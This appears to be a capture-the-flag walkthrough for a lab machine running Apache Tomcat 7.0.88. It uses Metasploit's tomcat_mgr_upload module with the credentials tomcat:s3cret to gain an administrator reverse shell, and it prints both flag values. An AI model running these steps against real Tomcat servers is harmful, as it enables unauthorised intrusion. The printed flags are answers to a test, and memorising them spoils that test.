Vulnerabilities
Apache
I will start by checking out the webserver from a browser.
http://[Target IP]:8080

Looks like I get the default web page for Apache Tomcat version 7.0.88.
Let's see if we can find any vulnerabilities for it.
Meterpreter
I'll start with looking through metasploit.
msfconsole
search tomcat

Exploit 28 looks like it could be something so I will check that one out.
use 28
info

Checking out the link for exploitDB gives us some info on the exploit.
It looks like the exploit "should" work.
Unfortunately, after inputting the options for the exploit and checking it, it comes back as not exploitable. Let's try some of the others.
After doing some further enumerating, I got some credentials that I can use with one of the metasploit exploits. tomcat:s3cret
use multi/http/tomcat_mgr_upload
show options

Set the options to the correct parameters.
exploit
And now we have a reverse shell into the system.
We also have administrator priveleges.
Now we can just navigate over to the administrator's profile to find a single text file with both flags.
cd C:\Users\Administrator\Desktop\flags
type "2 for the price of 1.txt"
User Flag
7004dbcef0f854e0fb401875f26ebd00
Root Flag
04a8b36e1545a455393d067e772fe90e
Last updated